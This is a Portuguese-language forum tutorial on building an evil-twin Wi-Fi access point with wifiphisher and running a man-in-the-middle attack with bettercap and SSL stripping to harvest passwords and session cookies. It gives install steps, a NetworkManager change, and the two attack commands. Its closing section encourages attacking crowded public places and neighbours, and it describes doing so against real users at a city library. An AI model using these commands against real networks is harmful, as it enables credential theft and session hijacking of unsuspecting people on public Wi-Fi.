Evil-Twin + MiTM + SSL Strip

Categorias: , , ,

Descrição

Evil-Twin e lançar um MiTM pra fazer uns credential harvesting, cookies harvesting pros session hijacking, e os caralhos a 4…. kkk

Organizei este tópico da seguinte forma:

  1. Introdução
  2. Instalação
  3. Configuração
  4. Attack Scenario
  5. Extra

Requerimentos*
– Adaptador Wireless extra que suporte modo monitor
– AP próximo com conexão a internet para ser nosso provedor de internet

Então let’s hack the gibson!!!

1 – Introdução

Eu não vou falar o que é um MiTM, Evil-Twin, Arp Spoofing, SSLStripping e etc.. porque vai deixar o tópico muito grande e também são coisas que ja estão muito bem documentadas, entao eu não preciso reenvientar a roda, você que tem que largar de preguiça e ir pesquisar. :D kk
Simplesmente vamos criar um ponto de acesso falso (Fake AP) e fazer um ataque man in the middle na rede usando o sslstrip e aguardar algum cliente conectar. Com este ataque é possivel capturar senhas de redes sociais, e-mails entre outros.
As variedades de opções de onde você pode aplicar este ataque realmente são muitas, seu limite é sua criatividade e conhecimento, pense fora da caixa, lembre-se disso!

2 – Instalação

As ferramentas usadas vão ser essas:
Bettercap ( Github – https://github.com/evilsocket/bettercap )
Wifiphisher ( Github – https://github.com/wifiphisher/wifiphisher )

Instalando Wifiphisher:

Code: Select all

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Instalando Bettercap

Dependências:

Code: Select all

sudo apt-get install build-essential ruby-dev libpcap-dev

O Kali-Linux possui o bettercap no repositório então é simples:

Code: Select all

sudo apt-get install bettercap

Ou você pode usar o comando ‘gem’ para instalar

Code: Select all

gem install bettercap

Feito isso tudo deve estar instalado com sucesso. ;)

3 – Configuração

Quando você conectar seu adaptador wireless no pc o NetworkManager automaticamente vai gerenciar ele, e quando ele faz isso impossibilita o wifiphisher de usar a interface, o que pode ocasionar no erro

[!] Interface “wlan2” is controlled by NetworkManager.You need to manually set the devices that should be ignored by NetworkManager using the keyfile plugin (unmanaged-directive).

Para resolver vamos alterar o arquivo /etc/NetworkManager/NetworkManager.conf

[main]
plugins=ifupdown,keyfile[ifupdown]
managed=false

Adicionando a seguinte linha

[keyfile]
unmanaged-devices=interface-name:wlan2

Assim o arquivo ficara desta forma:

[main]
plugins=ifupdown,keyfile[ifupdown]
managed=false[keyfile]
unmanaged-devices=interface-name:wlan2

Agora reinicie o serviço

Code: Select all

sudo service network-manager restart

Pronto nosso wireless card ta configurado.

Agora vamos entender os parametros que vamos passar nas tools

Wifiphisher
-e <ESSID> | Nome do AP que vamos criar
-aI <Interface> | Interface que vamos usar para criar o ponto de acesso ( Ex: wlan2 )
-iI <Interface< | Interface que vai fornecer a conexão com a internet
-pK <Password> | Password para o AP (Apenas se necessário)
-iAM <MAC> | MAC do AP

Bettercap
–proxy | Habilita o proxy HTTP e redireciona todo o trafego para ele
–log <File> | Arquivo de logs
-I <Interface> | interface para realizar o sniffing

Simples não é? nada complicado até agora, então vamos ao que interessa…

4 – Attack Scenario

Foi encontrado um lugar onde tem um AP proximo com internet disponivel para usarmos no evil-twin.
Nosso adaptador foi conectado ao pc, e depois configurado para não ser gerenciado pelo NetworkManager.
As ferramentas wifiphisher e bettercap estão instaladas e funcionando
Hora de atacar!

Criando o Evil-Twin com acesso a internet usando o wifiphisher

Code: Select all

sudo wifiphisher -e "Free Wi-Fi" -aI wlan2 -iI wlan1 -iAM ff:ff:ff:ff:ff:ff

Será criado um ponto de acesso com o ESSID “Free Wi-Fi” que possui acesso a internet

Lançando o MiTM com sslstrip atravez do bettercap

Code: Select all

sudo bettercap --proxy -I wlan2 --log BETTERCAP_SNIFF.log

Isso é tudo que precisa ser feito, duas simples linhas de comando e você tem um evil-twin com internet e um sniffer pra pegar conexões ssl
Uma boa dica seria usar o wireshark pra capturar os pacotes também pois da pra salvar num formato mais agradavel e investigar melhor depois.

5 – Extras

Bom agora que você ja sabe como realizar o ataque vem a pergunta, aonde realizar o ataque? As possibilidades realmente são praticamente infinitas mas existem alguns lugares comuns onde você pode ter mais facilidade em fazer, por exemplo você pode ir em algum local publico movimentado e fazer la, no shopping, ou na sua casa quando o vizinho faz festa…. kk :p

Um exemplo real que eu fiz só pra testar foi na biblioteca da cidade, la são vários andares e cada andar possui um AP aberto com o essid ‘Biblioteca’, conectei ao wifi aberto com o wirelress card 1(wlan1) e criei meu Evil-Twin com o essid ‘Biblioteca’ no wireless card 2 (wlan2) e liguei o sniffer , depois nem preciso dizer neh…